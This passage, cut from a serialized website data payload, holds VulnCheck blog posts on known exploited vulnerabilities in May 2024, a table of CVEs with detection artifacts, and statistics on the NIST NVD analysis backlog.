effectively.",[61,72307,202],{"id":201},[18,72309,205],{},[18,72311,208],{},[18,72313,211,72314,217],{},[47,72315,216],{"href":214,"rel":72316},[51],{"title":219,"searchDepth":220,"depth":220,"links":72318},[72319,72320,72321],{"id":72159,"depth":220,"text":72160},{"id":72204,"depth":220,"text":72205},{"id":201,"depth":220,"text":202},{"slug":72323},"vulnerability-prioritization","\u002Fblog\u002Fvulnerability-prioritization",{"title":66054,"description":72152},"blog\u002Fvulnerability-prioritization","yTJC9gXMBW4mP9NEvpm5IPZ8gsnCvtKfpAhYJLEIiyQ",{"id":72329,"title":72330,"articles":7,"authors":72331,"body":72333,"date":71816,"description":72514,"extension":234,"image":7,"link":7,"meta":72515,"navigation":237,"path":72517,"seo":72518,"series":7,"stem":72519,"subtype":7,"tags":72520,"__hash__":72521},"blog\u002Fblog\u002Fkev-report-may-2024.md","VulnCheck Exploited Vulnerabilities Report - May 2024",[72332],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":72334,"toc":72511},[72335,72338,72340,72357,72361,72366,72369,72392,72395,72399,72405,72432,72434,72439,72442,72467,72470,72472,72477,72480,72484,72487,72489,72500,72502,72504,72506],[18,72336,72337],{},"In May, VulnCheck identified evidence of 103 CVEs that were publicly disclosed for the first time as exploited in the wild, marking a 90.7% increase over April. This growth in public disclosure aligns with the rising trend in vulnerability exploitation, as highlighted by Verizon’s 2024 Data Breach Investigations Report (DBIR), which reported a massive 180% increase in vulnerability exploitation between 2022 and 2023.",[1920,72339,20],{"id":3520},[22,72341,72342,72345,72348,72351,72354],{},[25,72343,72344],{},"In May, VulnCheck identified 103 CVEs that were publicly disclosed for the first time as exploited in the wild - a 90%+ increase since April.",[25,72346,72347],{},"Software that topped the list with new exploitation evidence includes Google Chrome, Microsoft Windows, Apple Safari and Adobe Acrobat Reader.",[25,72349,72350],{},"New Exploitation Evidence sourced from Fortinet, CheckPoint, Aqua Security reports contributed to May’s spike in known exploited vulnerabilities.",[25,72352,72353],{},"VulnCheck sourced known exploitation evidence faster than CISA for 71.4% of vulnerabilities from alternate sources in May.",[25,72355,72356],{},"As of May 31st, 10 Known Exploited Vulnerabilities are still awaiting analysis by NIST NVD.",[1920,72358,72360],{"id":72359},"may-vendor-and-product-breakdown","May Vendor and Product Breakdown",[18,72362,72363],{},[68,72364],{":width":10862,"alt":58618,"src":72365},"\u002Fblog\u002Fkev-report-may-2024\u002Fvulncheck-kev-may-vendors.png",[18,72367,72368],{},"The 103 CVEs with known exploitation evidence were associated with 58 software suppliers across 73 unique products. The following software topped the list with two or more CVEs with known exploitation:",[22,72370,72371,72374,72377,72380,72383,72386,72389],{},[25,72372,72373],{},"Google Chrome: 7",[25,72375,72376],{},"Microsoft Windows: 5",[25,72378,72379],{},"Apple Safari: 5",[25,72381,72382],{},"Adobe Acrobat Reader: 3",[25,72384,72385],{},"Microsoft Exchange: 2",[25,72387,72388],{},"Oracle JDK: 2",[25,72390,72391],{},"phpMyAdmin: 2",[18,72393,72394],{},"TP-Link’s TL-R600VPN (2) is new to the VulnCheck Known Exploited Vulnerabilities (KEV), and Arcserve Unified Data Protection (3) has its first newly confirmed exploited vulnerabilities since early 2022.",[1920,72396,72398],{"id":72397},"significant-increase-in-vulnerability-exploitation-disclosure","Significant Increase in Vulnerability Exploitation Disclosure",[18,72400,72401,72404],{},[68,72402],{":width":10862,"alt":58618,"src":72403},"\u002Fblog\u002Fkev-report-may-2024\u002Fvulncheck-kev-increase.png","\nInvestigating the substantial increase in new vulnerability exploitation disclosures, we observe a significant spike from previous months.\nVulnCheck KEV has been in existence since January 2021 and prior to May, the only significant spikes in VulnCheck KEV data were:",[22,72406,72407,72416,72423],{},[25,72408,72409,72410,72415],{},"In April of 2021, Palo Alto’s Unit 42 ",[47,72411,72414],{"href":72412,"rel":72413,":target":10881},"https:\u002F\u002Funit42.paloaltonetworks.com\u002Fnetwork-attack-trends-winter-2020\u002F",[51],"published a report"," including 2020’s top exploited vulnerabilities.",[25,72417,72418,72419,72422],{},"Late 2021, the Cybersecurity and Infrastructure Security Agancy(CISA) launched ",[47,72420,31643],{"href":2864,"rel":72421,":target":10881},[51]," resulting in a spike in November 2021 and March 2022.",[25,72424,72425,72426,72431],{},"Late 2023\u002FEarly 2024 onboarding ",[47,72427,72430],{"href":72428,"rel":72429,":target":10881},"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fhoneypot\u002Fvulnerability\u002Fmonitoring\u002F?category=monitoring&statistic=unique_ips&limit=100",[51],"ShadowServer"," as a new source for known exploitation.",[1920,72433,66500],{"id":66499},[18,72435,72436],{},[68,72437],{":width":10862,"alt":58618,"src":72438},"\u002Fblog\u002Fkev-report-may-2024\u002Fvulncheck-kev-may-source.png",[18,72440,72441],{},"To understand the increase in the disclosure of known exploited vulnerabilities, we examined the reference sources provided with VulnCheck KEV. Three sources account for 49 unique vulnerabilities:",[22,72443,72444,72452,72460],{},[25,72445,72446,72451],{},[47,72447,72450],{"href":72448,"rel":72449,":target":10881},"https:\u002F\u002Fwww.fortinet.com\u002Fcontent\u002Fdam\u002Ffortinet\u002Fassets\u002Fthreat-reports\u002Fthreat-landscape-report-2h-2023.pdf",[51],"Fortinet’s 2H-2023 Global Threat Landscape Report",": 26 new KEVs",[25,72453,72454,72459],{},[47,72455,72458],{"href":72456,"rel":72457,":target":10881},"https:\u002F\u002Fblog.checkpoint.com\u002Fsecurity\u002Fapril-2024s-most-wanted-malware-surge-in-androxgh0st-attacks-and-the-decline-of-lockbit3\u002F",[51],"CheckPoint’s April 2024’s Most Wanted Malware Blog Post",": 14 new KEVs",[25,72461,72462,72466],{},[47,72463,72465],{"href":10518,"rel":72464,":target":10881},[51],"Aqua Security’s Kinsing Demystified Guide",": 9 KEVs",[18,72468,72469],{},"While this spike might align with seasonal trends and the RSA conference, it also demonstrates security vendors’ willingness to share broader vulnerability intelligence on known exploitation. This transparency is a significant positive for security teams, as it enhances their visibility into known exploitation.",[1920,72471,66519],{"id":66518},[18,72473,72474],{},[68,72475],{":width":10862,"alt":66524,"src":72476},"\u002Fblog\u002Fkev-report-may-2024\u002Fcisa-kev.png",[18,72478,72479],{},"In May 2024, CISA added 14 vulnerabilities to its KEV, representing 13.6% of the vulnerabilities that VulnCheck discovered as having public exploitation evidence for the first time. VulnCheck sourced known exploitation evidence faster than CISA for 71.4% of these vulnerabilities from alternate sources.",[1920,72481,72483],{"id":72482},"exploited-vulnerabilities-continue-to-go-unprocessed-by-nist-nvd","Exploited Vulnerabilities Continue to go unprocessed by NIST NVD",[18,72485,72486],{},"In May, 22 out of 103 vulnerabilities added to VulnCheck KEV were published after February 12, 2024, when the NIST National Vulnerability Database (NVD) slowed down processing new vulnerabilities. Of these 22 known exploited vulnerabilities, 45% (10) were still awaiting analysis by NIST NVD as of May 31st.",[1920,72488,64665],{"id":64664},[18,72490,64668,72491,64672,72494,982,72497,59],{},[47,72492,28667],{"href":40745,"rel":72493},[51],[47,72495,1233],{"href":2871,"rel":72496},[51],[47,72498,40672],{"href":40670,"rel":72499},[51],[61,72501,202],{"id":201},[18,72503,205],{},[18,72505,208],{},[18,72507,211,72508,217],{},[47,72509,216],{"href":214,"rel":72510},[51],{"title":219,"searchDepth":220,"depth":220,"links":72512},[72513],{"id":201,"depth":220,"text":202},"In May, VulnCheck identified evidence of 103 CVEs that were publicly disclosed for the first time as exploited in the wild, marking a 90.7% increase over April.",{"slug":72516},"kev-report-may-2024","\u002Fblog\u002Fkev-report-may-2024",{"title":72330,"description":72514},"blog\u002Fkev-report-may-2024",[1279],"IG-C0WhFisbVYQx-QJUPcMw_YrboHwAy9I_opMiEG3w",{"id":72523,"title":72524,"articles":7,"authors":72525,"body":72527,"date":73049,"description":72533,"extension":234,"image":7,"link":7,"meta":73050,"navigation":237,"path":73052,"seo":73053,"series":7,"stem":73054,"subtype":7,"tags":73055,"__hash__":73056},"blog\u002Fblog\u002Finitial-access-intelligence-may-2024.md","VulnCheck Initial Access Intelligence Update - May 2024",[72526],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":72528,"toc":73045},[72529,72531,72534,72540,72543,72559,72563,73038,73040],[18,72530,68846],{},[18,72532,72533],{},"In May 2024, we developed new Initial Access Intelligence (IAI) artifacts for 20 CVEs, covering 16 different vendors and 18 different products.",[18,72535,72536],{},[68,72537],{":width":10862,"alt":72538,"src":72539},"Initial Access Intelligence - May 2024","\u002Fblog\u002Finitial-access-intelligence-may-2024\u002Fvulncheck-initial-access.png",[18,72541,72542],{},"To provide better visibility into these updates, we’ve broken down May’s Initial Access Intelligence Artifacts by CVE. For each CVE, we provide a range of detection tools including:",[22,72544,72545,72547,72549,72551,72553,72555,72557],{},[25,72546,325],{},[25,72548,59440],{},[25,72550,59443],{},[25,72552,59446],{},[25,72554,59449],{},[25,72556,59452],{},[25,72558,64745],{},[61,72560,72562],{"id":72561},"may-2024-initial-access-artifacts","May 2024 Initial Access Artifacts",[307,72564,72565,72587],{},[310,72566,72567],{},[313,72568,72569,72571,72573,72575,72577,72579,72581,72583,72585],{},[316,72570,59471],{},[316,72572,59474],{},[316,72574,319],{},[316,72576,59479],{},[316,72578,59482],{},[316,72580,59485],{},[316,72582,59488],{},[316,72584,61654],{},[316,72586,61657],{},[336,72588,72589,72612,72635,72657,72679,72702,72725,72747,72770,72792,72814,72836,72859,72880,72903,72925,72948,72970,72993,73016],{},[313,72590,72591,72594,72597,72600,72602,72604,72606,72608,72610],{},[341,72592,72593],{},"Nexus Repository Manager Path Traversal",[341,72595,72596],{},"2024-05-31",[341,72598,72599],{},"CVE-2024-4956",[341,72601,59510],{},[341,72603,59510],{},[341,72605,59510],{},[341,72607,59510],{},[341,72609,59510],{},[341,72611],{},[313,72613,72614,72617,72620,72623,72625,72627,72629,72631,72633],{},[341,72615,72616],{},"Netis MW5360 Password Command Injection",[341,72618,72619],{},"2024-05-30",[341,72621,72622],{},"CVE-2024-22729",[341,72624,59510],{},[341,72626,59510],{},[341,72628,59510],{},[341,72630,59510],{},[341,72632,59510],{},[341,72634],{},[313,72636,72637,72640,72642,72645,72647,72649,72651,72653,72655],{},[341,72638,72639],{},"Rejetto HFS 2.3m RCE",[341,72641,72619],{},[341,72643,72644],{},"CVE-2024-23692",[341,72646,59510],{},[341,72648,59510],{},[341,72650,59510],{},[341,72652,59510],{},[341,72654,59510],{},[341,72656],{},[313,72658,72659,72662,72664,72667,72669,72671,72673,72675,72677],{},[341,72660,72661],{},"Netis SOHO Admin Credential Leak",[341,72663,72619],{},[341,72665,72666],{},"CVE-2024-23693",[341,72668,59510],{},[341,72670],{},[341,72672,59510],{},[341,72674,59510],{},[341,72676,59510],{},[341,72678],{},[313,72680,72681,72684,72687,72690,72692,72694,72696,72698,72700],{},[341,72682,72683],{},"Telesquare TLR-2005Ksh sysCommand RCE",[341,72685,72686],{},"2024-05-29",[341,72688,72689],{},"CVE-2024-29269",[341,72691],{},[341,72693,59510],{},[341,72695,59510],{},[341,72697,59510],{},[341,72699,59510],{},[341,72701],{},[313,72703,72704,72707,72710,72713,72715,72717,72719,72721,72723],{},[341,72705,72706],{},"Cisco RV Series Upload Symlink Traverse RCE",[341,72708,72709],{},"2024-05-24",[341,72711,72712],{},"CVE-2024-23691",[341,72714,59510],{},[341,72716,59510],{},[341,72718,59510],{},[341,72720,59510],{},[341,72722,59510],{},[341,72724],{},[313,72726,72727,72730,72732,72735,72737,72739,72741,72743,72745],{},[341,72728,72729],{},"Bricks Builder WordPress RCE",[341,72731,72709],{},[341,72733,72734],{},"CVE-2024-25600",[341,72736,59510],{},[341,72738,59510],{},[341,72740,59510],{},[341,72742,59510],{},[341,72744,59510],{},[341,72746],{},[313,72748,72749,72752,72755,72758,72760,72762,72764,72766,72768],{},[341,72750,72751],{},"nostromo (nhttpd) Path Traversal RCE",[341,72753,72754],{},"2024-05-21",[341,72756,72757],{},"CVE-2019-16278",[341,72759,59510],{},[341,72761,59510],{},[341,72763,59510],{},[341,72765],{},[341,72767],{},[341,72769],{},[313,72771,72772,72775,72777,72780,72782,72784,72786,72788,72790],{},[341,72773,72774],{},"Struts Path Traversal RCE",[341,72776,72754],{},[341,72778,72779],{},"CVE-2023-50164",[341,72781,59510],{},[341,72783,59510],{},[341,72785,59510],{},[341,72787],{},[341,72789],{},[341,72791],{},[313,72793,72794,72796,72799,72802,72804,72806,72808,72810,72812],{},[341,72795,61848],{},[341,72797,72798],{},"2024-05-17",[341,72800,72801],{},"CVE-2023-6549",[341,72803,59510],{},[341,72805],{},[341,72807,59510],{},[341,72809,59510],{},[341,72811,59510],{},[341,72813],{},[313,72815,72816,72819,72821,72824,72826,72828,72830,72832,72834],{},[341,72817,72818],{},"Cacti cmd_realtime.php RCE Attempt",[341,72820,72798],{},[341,72822,72823],{},"CVE-2024-29895",[341,72825],{},[341,72827],{},[341,72829,59510],{},[341,72831,59510],{},[341,72833,59510],{},[341,72835,59510],{},[313,72837,72838,72841,72844,72847,72849,72851,72853,72855,72857],{},[341,72839,72840],{},"pgAdmin Validate Binary Injection",[341,72842,72843],{},"2024-05-15",[341,72845,72846],{},"CVE-2022-4223",[341,72848,59510],{},[341,72850,59510],{},[341,72852,59510],{},[341,72854,59510],{},[341,72856,59510],{},[341,72858],{},[313,72860,72861,72863,72866,72868,72870,72872,72874,72876,72878],{},[341,72862,61779],{},[341,72864,72865],{},"2024-05-14",[341,72867,31440],{},[341,72869,59510],{},[341,72871,59510],{},[341,72873,59510],{},[341,72875,59510],{},[341,72877,59510],{},[341,72879,59510],{},[313,72881,72882,72885,72888,72891,72893,72895,72897,72899,72901],{},[341,72883,72884],{},"Tinyproxy UAF",[341,72886,72887],{},"2024-05-13",[341,72889,72890],{},"CVE-2023-49606",[341,72892],{},[341,72894,59510],{},[341,72896,59510],{},[341,72898,59510],{},[341,72900,59510],{},[341,72902],{},[313,72904,72905,72908,72910,72913,72915,72917,72919,72921,72923],{},[341,72906,72907],{},"OpenMetadata JWT Bypass RCE",[341,72909,72887],{},[341,72911,72912],{},"CVE-2024-28255",[341,72914,59510],{},[341,72916,59510],{},[341,72918,59510],{},[341,72920,59510],{},[341,72922,59510],{},[341,72924],{},[313,72926,72927,72930,72933,72936,72938,72940,72942,72944,72946],{},[341,72928,72929],{},"D-Link NAS Hard-Coded Credentials",[341,72931,72932],{},"2024-05-05",[341,72934,72935],{},"CVE-2024-3272",[341,72937,59510],{},[341,72939],{},[341,72941,59510],{},[341,72943],{},[341,72945],{},[341,72947],{},[313,72949,72950,72953,72955,72958,72960,72962,72964,72966,72968],{},[341,72951,72952],{},"D-Link NAS Command Injection",[341,72954,72932],{},[341,72956,72957],{},"CVE-2024-3273",[341,72959,59510],{},[341,72961],{},[341,72963,59510],{},[341,72965,59510],{},[341,72967,59510],{},[341,72969],{},[313,72971,72972,72975,72978,72981,72983,72985,72987,72989,72991],{},[341,72973,72974],{},"Netgear VPN Configuration Backup RCE",[341,72976,72977],{},"2024-05-03",[341,72979,72980],{},"CVE-2024-23690",[341,72982,59510],{},[341,72984,59510],{},[341,72986,59510],{},[341,72988,59510],{},[341,72990,59510],{},[341,72992],{},[313,72994,72995,72998,73001,73004,73006,73008,73010,73012,73014],{},[341,72996,72997],{},"Apache Tomcat WebDAV Webshell Upload",[341,72999,73000],{},"2024-05-01",[341,73002,73003],{},"CVE-2017-12617",[341,73005,59510],{},[341,73007,59510],{},[341,73009,59510],{},[341,73011,59510],{},[341,73013,59510],{},[341,73015],{},[313,73017,73018,73021,73023,73026,73028,73030,73032,73034,73036],{},[341,73019,73020],{},"Apache Tomcat 'Ghostcat' File Leak",[341,73022,73000],{},[341,73024,73025],{},"CVE-2020-1938",[341,73027,59510],{},[341,73029,59510],{},[341,73031,59510],{},[341,73033,59510],{},[341,73035,59510],{},[341,73037],{},[61,73039,59851],{"id":59850},[18,73041,59854,73042],{},[47,73043,59857],{"href":59857,"rel":73044},[51],{"title":219,"searchDepth":220,"depth":220,"links":73046},[73047,73048],{"id":72561,"depth":220,"text":72562},{"id":59850,"depth":220,"text":59851},"2024-06-07",{"slug":73051},"initial-access-intelligence-may-2024","\u002Fblog\u002Finitial-access-intelligence-may-2024",{"title":72524,"description":72533},"blog\u002Finitial-access-intelligence-may-2024",[1281],"4CA5VSvVxT2e5zgiAwfJADi4l1PCmZo1XoKIMXX6Mz8",{"id":73058,"title":65394,"articles":73059,"authors":73141,"body":73143,"date":73063,"description":73307,"extension":234,"image":7,"link":7,"meta":73308,"navigation":237,"path":73310,"seo":73311,"series":7,"stem":73312,"subtype":7,"tags":73313,"__hash__":73314},"blog\u002Fblog\u002Fnvd-backlog-exploitation.md",[73060,73064,73067,73070,73075,73079,73082,73086,73089,73092,73095,73098,73101,73105,73108,73111,73114,73119,73123,73127,73130,73134,73138],{"title":73061,"source":57680,"link":73062,"date":73063},"NVD Leaves Exploited Vulnerabilities Unchecked","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fnvd-exploited-vulnerabilities\u002F","2024-05-23",{"title":73065,"source":12162,"link":73066,"date":73063},"93% of vulnerabilities unanalyzed by NVD since February","https:\u002F\u002Fwww.techtarget.com\u002Fsearchsecurity\u002Fnews\u002F366586172\u002F93-of-vulnerabilities-unanalyzed-by-NVD-since-February",{"title":73068,"source":65365,"link":73069,"date":72709},"Amid funding cuts, backlog of unanalyzed vulnerabilities in gov't database is growing","https:\u002F\u002Ftherecord.media\u002Fnist-database-backlog-growing-vulncheck",{"title":73071,"source":73072,"link":73073,"date":73074},"Cybersecurity News: Arc browser sabotaged, Cencora pharma breach, Albany County breach","CISO Series","https:\u002F\u002Fcisoseries.com\u002Fcybersecurity-news-arc-browser-sabotaged-cencora-pharma-breach-albany-county-breach\u002F","2024-05-27",{"title":73076,"source":10841,"link":73077,"date":73078},"Critical CVEs are going under-analyzed as NIST falls behind","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Fnist-cve-analysis-gap\u002F717226\u002F","2024-05-28",{"title":73080,"source":11233,"link":73081,"date":73078},"NVD cutbacks hamper NIST’s vulnerability analysis","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Fnvd-cutbacks-hamper-nists-vulnerability-analysis",{"title":73083,"source":73084,"link":73085,"date":72686},"Report: Vulnerability analysis backlog spurred by NIST database slowdown results in significant information shortage","Inside Cybersecurity","https:\u002F\u002Finsidecybersecurity.com\u002Fdaily-news\u002Freport-vulnerability-analysis-backlog-spurred-nist-database-slowdown-results-significant",{"title":73087,"source":23286,"link":73088,"date":72686},"NIST Struggles with NVD Backlog as 93% of Flaws Remain Unanalyzed","https:\u002F\u002Fsecurityboulevard.com\u002F2024\u002F05\u002Fnist-struggles-with-nvd-backlog-as-93-of-flaws-remain-unanalyzed\u002F",{"title":73090,"source":65365,"link":73091,"date":72686},"NIST expects to clear backlog in vulnerabilities database by end of fiscal year","https:\u002F\u002Ftherecord.media\u002Fnist-nvd-backlog-clear-end-fiscal-2024",{"title":73093,"source":14378,"link":73094,"date":72619},"NIST Getting Outside Help for National Vulnerability Database","https:\u002F\u002Fwww.securityweek.com\u002Fnist-getting-outside-help-for-national-vulnerability-database\u002F",{"title":73096,"source":2950,"link":73097,"date":72619},"Turf wars? NIST to fix NVD backlog by September – insists it’s right agency to run vulnerability database","https:\u002F\u002Fwww.thestack.technology\u002Fturf-wars-nist-says-it-will-fix-nvd-backlog-by-september-insists-its-the-right-agency-to-run-the-vulnerability-database\u002F",{"title":73099,"source":10841,"link":73100,"date":72596},"NIST has a plan to clear the vulnerability analysis backlog","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Fnist-vulnerability-analysis-backlog\u002F717631\u002F",{"title":73102,"source":73103,"link":73104,"date":72596},"NIST taps Analygence to help fix vulnerability database backlog","Nextgov\u002FFCW","https:\u002F\u002Fwww.nextgov.com\u002Fcybersecurity\u002F2024\u002F05\u002Fnist-taps-analygence-help-fix-vulnerability-database-backlog\u002F397028\u002F",{"title":73106,"source":23286,"link":73107,"date":71680},"The NIST Finally Hires a Contractor to Manage CVEs","https:\u002F\u002Fsecurityboulevard.com\u002F2024\u002F06\u002Fthe-nist-finally-hires-a-contractor-to-manage-cves\u002F",{"title":73109,"source":3481,"link":73110,"date":71680},"NIST turns to IT consultants to clear National Vulnerability Database backlog","https:\u002F\u002Fwww.theregister.com\u002F2024\u002F06\u002F03\u002Fnist_cve_backlog\u002F",{"title":73102,"source":73112,"link":73113,"date":71680},"Washington Technology","https:\u002F\u002Fwashingtontechnology.com\u002Fcontracts\u002F2024\u002F06\u002Fnist-taps-analygence-help-fix-vulnerability-database-backlog\u002F397068\u002F",{"title":73115,"source":73116,"link":73117,"date":73118},"Understanding the impact of the NIST NVD backlog on MSPs","Security Magazine","https:\u002F\u002Fwww.securitymagazine.com\u002Farticles\u002F100795-understanding-the-impact-of-the-nist-nvd-backlog-on-msps","2024-07-16",{"title":73120,"source":73121,"link":73122,"date":69238},"Why the NVD Backlog Boosts the Case for Exposure Management","Security Magazine UK","https:\u002F\u002Finsight.scmagazineuk.com\u002Fwhy-the-nvd-backlog-boosts-the-case-for-exposure-management",{"title":73124,"source":73125,"link":73126,"date":68288},"Veracode highlights security risks of GenAI coding tools","SearchSecurity","https:\u002F\u002Fwww.techtarget.com\u002Fsearchsecurity\u002Fnews\u002F366600097\u002FVeracode-highlights-security-risks-of-GenAI-coding-tools",{"title":73128,"source":11233,"link":73129,"date":68021},"Combating alert fatigue by prioritizing malicious intent","https:\u002F\u002Fwww.scworld.com\u002Fperspective\u002Fcombating-alert-fatigue-by-prioritizing-malicious-intent",{"title":73131,"source":73132,"link":73133,"date":66190},"CVE backlog update: The NVD struggles as attackers change tactics","Security Intellegence","https:\u002F\u002Fsecurityintelligence.com\u002Farticles\u002Fcve-backlog-update-nvd-struggles-attackers-change-tactics\u002F",{"title":73135,"source":73136,"link":73137,"date":65671},"Beyond Disclosure: Transforming Vulnerability Data Into Actionable Security","InfoSecurityMagazine","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews-features\u002Fvulnerability-data-actionable\u002F",{"title":73139,"source":34002,"link":73140,"date":28159},"Security experts claim the CVE Program isn’t up to scratch anymore — inaccurate scores and lengthy delays mean the system needs updated","https:\u002F\u002Fwww.itpro.com\u002Fsecurity\u002Fsecurity-experts-claim-the-cve-program-isnt-up-to-scratch-anymore-inaccurate-scores-and-lengthy-delays-mean-the-system-needs-updated",[73142],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":73144,"toc":73297},[73145,73151,73154,73157,73160,73163,73165,73179,73183,73186,73197,73200,73203,73205,73208,73214,73216,73222,73225,73228,73233,73237,73240,73243,73248,73252,73255,73260,73264,73267,73278,73284,73286,73288,73290,73292],[18,73146,73147],{},[68,73148],{":width":10862,"alt":73149,"src":73150},"Weekly CVE's Published by Status","\u002Fblog\u002Fnvd-backlog-exploitation\u002Fweekly-cve.png",[18,73152,73153],{},"On February 12, 2024, the NIST National Vulnerability Database (NVD) began slowing the processing and enrichment of new vulnerabilities. Since that date, 12,720 new vulnerabilities and counting have been added to NVD but 11,885 have not been analyzed or enriched with critical data that help security professionals determine what software has been affected by a vulnerability. By February 15, the NVD website announced that users might experience \"delays in analysis efforts.\"",[18,73155,73156],{},"Numerous prominent and influential voices in the industry have warned about how this gives malicious threat actors an upper hand in weaponizing vulnerabilities with exploits that greatly increases supply chain risks across critical sectors.",[18,73158,73159],{},"With the recent slowdown of the NIST National Vulnerability Database (NVD), it's crucial to understand the gravity of the situation. Nation-state threat actors and ransomware gangs continue to target organizations with devastating consequences, while our own house is in disarray. Although we can speculate on the underlying causes leading to the NVD's near cessation, one thing is clear: threats continue to persist and show no signs of following NIST's lead.",[18,73161,73162],{},"This research aims to illustrate this gravity, utilizing data sourced from the NVD and VulnCheck’s exploit and vulnerability service. The research focused on new CVE’s published by NVD between February 12 and May 20, 2024.",[61,73164,43093],{"id":43092},[22,73166,73167,73170,73173,73176],{},[25,73168,73169],{},"93.4% of new vulnerabilities have not been analyzed by the National Vulnerability Database (NVD) since February 12, 2024.",[25,73171,73172],{},"50.8% of VulnCheck Known Exploited Vulnerabilities have not been analyzed by the National Vulnerability Database (NVD) since February 12, 2024.(Source: VulnCheck KEV).",[25,73174,73175],{},"55.9% of Weaponized Vulnerabilities have not been analyzed by the National Vulnerability Database (NVD) since February 12, 2024.",[25,73177,73178],{},"82% of CVEs with a Proof-of-Concept Exploit have not been analyzed by the National Vulnerability Database (NVD) since February 12, 2024.",[61,73180,73182],{"id":73181},"nist-nvds-important-role-in-the-vulnerability-ecosystem","NIST NVD's Important Role in the Vulnerability Ecosystem",[18,73184,73185],{},"For over 20 years, the NIST NVD has played a critical role as a primary source for software vulnerability data, serving organizations worldwide. The NVD has provided three primary functions:",[22,73187,73188,73191,73194],{},[25,73189,73190],{},"CVE Enrichment: CVSS scoring, CWE, CPE configurations, and reference tags.",[25,73192,73193],{},"Consumable Data Access: Consistent and easy-to-consume JSON, CVEs with enrichment from one source.",[25,73195,73196],{},"CNA\u002FVendor Accountability: CVE rejections and data quality.",[18,73198,73199],{},"While there is debate over the NVD’s approach, it has a long track record as the go-to source for enriched CVE data and is incorporated into several government mandates as the source of truth for vulnerability management requirements.",[18,73201,73202],{},"As the security community reacts to an uncertain future for the NVD and scrambles to fill this void, it is important to provide real-world insight into the threats that persist as the NVD falters to provide a critical service for the world.",[61,73204,65430],{"id":65429},[18,73206,73207],{},"The outlook for the NVD is bleak. As of now, 93.4% of vulnerabilities remain unanalyzed. Out of 12,720 new vulnerabilities added to the database since February 12, 11,885 have not been analyzed by the NVD.",[18,73209,73210],{},[68,73211],{":width":10862,"alt":73212,"src":73213},"NVD Status Since February 12th, 2024","\u002Fblog\u002Fnvd-backlog-exploitation\u002Fnvd-status.png",[61,73215,65442],{"id":65441},[18,73217,73218,73219,27987],{},"As of May 20th, 50.8% of Known Exploited Vulnerabilities are unanalyzed by the NVD. Thirty out of 59 Known Exploited Vulnerabilities (KEVs) have not been analyzed by the NVD (Source: ",[47,73220,1233],{"href":2871,"rel":73221},[51],[18,73223,73224],{},"Several of the Known Exploited Vulnerabilities that are unanalyzed impact technologies including Microsoft Windows, Adobe ColdFusion, Progress Flowmon, ChatGPT, Qnap, Netlify OpenMetadata, WordPress and others.",[18,73226,73227],{},"VulnCheck Known Exploited Vulnerabilities (KEV) catalog is a real-time collection of known exploited vulnerabilities that is inclusive of CISA KEV, made available as a free community resource with publicly referencable citations.",[18,73229,73230],{},[68,73231],{":width":10862,"alt":73149,"src":73232},"\u002Fblog\u002Fnvd-backlog-exploitation\u002Fvulncheck-kev-nvd-status.png",[61,73234,73236],{"id":73235},"unaddressed-weaponized-cves","Unaddressed Weaponized CVEs",[18,73238,73239],{},"Weaponized typically is an exploit that delivers a substantial payload. For example, Metasploit exploits are considered \"weaponized\" (as they can deliver meterpreter or other advanced payloads).",[18,73241,73242],{},"As of May 20th, 55.9% of Weaponized Vulnerabilities are unanalyzed by the NVD. Thirty-eight out of 68 Weaponized Vulnerabilities have not been analyzed by the NVD (Source: VulnCheck Exploit and Vulnerbality Intelligence).",[18,73244,73245],{},[68,73246],{":width":10862,"alt":73149,"src":73247},"\u002Fblog\u002Fnvd-backlog-exploitation\u002Fvulncheck-weaponized.png",[61,73249,73251],{"id":73250},"unaddressed-vulnerabilities-w-proof-of-concept-code","Unaddressed Vulnerabilities w\u002F Proof-of-Concept Code",[18,73253,73254],{},"As of May 20th, 82% of CVEs with a Proof-of-Concept Exploit are unanalyzed by the NVD: Of the 482 CVEs that have a Proof-of-Concept Exploit associated, 396 remain unanalyzed by the NVD.",[18,73256,73257],{},[68,73258],{":width":10862,"alt":73149,"src":73259},"\u002Fblog\u002Fnvd-backlog-exploitation\u002Fvulncheck-poc.png",[61,73261,73263],{"id":73262},"the-path-forward-for-cveorg-and-nist-nvd","The Path Forward for CVE.org and NIST NVD",[18,73265,73266],{},"While uncertainty around the future of NIST NVD remains, it’s in the best interest of the CVE community to coordinate efforts to fill the void that NIST has currently created.",[22,73268,73269,73272,73275],{},[25,73270,73271],{},"For CVE numbering authorities (CNAs), it benefits downstream consumers of CVE data to provide more complete data when publishing new CVEs. CNAs should work toward enriching CVE records as completely as possible, including the submission of product names, vendor names, version numbers, thorough descriptions, broad references, CPE, CVSS, and CWE.",[25,73273,73274],{},"CVE.org\u002FMITRE and NVD should focus on automating CVE enrichment where possible and focus on completing the gaps where CNAs haven’t supplied sufficient information. NVD should deprioritize analyzing every CVE submission and move to a model where they establish trust with CNAs and the CVE program that doesn’t require a manual review of every CVE.",[25,73276,73277],{},"CVE.org\u002FMITRE should consider accelerating the Authorized Data Provider (ADP) program to validate and allow third-party contributions to enrich CVE.org data. This would include incorporating projects like CISA’s Vulnrichment project, CISA KEV and other third party sources.",[18,73279,73280,73281,59],{},"Regardless of the uncertainty, VulnCheck is committed to contributing back to the security community. VulnCheck is providing vulnerability enrichment services, including CPE and access to NIST-NVD and CVE Mitre data from a single source at no cost. Anyone can register for the free service here: ",[47,73282,40745],{"href":40745,"rel":73283},[51],[18,73285,65635],{},[61,73287,202],{"id":201},[18,73289,205],{},[18,73291,208],{},[18,73293,211,73294,217],{},[47,73295,216],{"href":214,"rel":73296},[51],{"title":219,"searchDepth":220,"depth":220,"links":73298},[73299,73300,73301,73302,73303,73304,73305,73306],{"id":43092,"depth":220,"text":43093},{"id":73181,"depth":220,"text":73182},{"id":65429,"depth":220,"text":65430},{"id":65441,"depth":220,"text":65442},{"id":73235,"depth":220,"text":73236},{"id":73250,"depth":220,"text":73251},{"id":73262,"depth":220,"text":73263},{"id":201,"depth":220,"text":202},"A look into the real dangers of exploitation lurking in the NVD 